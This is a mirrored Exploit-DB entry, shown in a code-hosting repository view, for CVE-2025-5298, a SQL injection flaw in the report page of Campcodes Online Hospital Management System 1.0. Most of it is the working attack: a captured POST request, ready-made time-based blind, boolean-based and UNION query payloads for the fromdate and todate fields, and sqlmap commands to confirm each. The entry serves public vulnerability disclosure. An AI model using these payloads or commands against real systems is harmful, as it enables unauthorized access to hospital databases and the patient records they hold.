bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52312.txt
Exploit-DB c3b152279e DB: 2025-05-30 
7 changes to exploits/shellcodes/ghdb

Automic Agent 24.3.0 HF4 - Privilege Escalation

Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass

SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal

Campcodes Online Hospital Management System 1.0 - SQL Injection

WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing

Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
2025-05-30 00:16:26 +00:00

72 lines
No EOL
3.4 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: Carine Constantino
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Linux - Ubuntu Ubuntu 23.10
# CVE: CVE-2025-5298
# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
# The report in admin/betweendates-detailsreports.php does not validate fromdate and todate fields
# And allows the processing of SQL Injection queries of the types:
# blind time-based in the fromdate field
# boolean-based in the todate field
# Union Query in the todate field
fromdate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
Upgrade-Insecure-Requests: 1
Priority: u=0, i
fromdate=&todate=&submit=
=======================================|| Blind Time Based - fromdate field ||==============================================
SQLMap identified the following injection payload:
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
=======================================|| Boolean Based - todate field ||==============================================
todate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
=======================================|| Union Query - todate field ||==============================================
Another technique on todate field can be exploited
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”
Reference in a new issue View git blame Copy permalink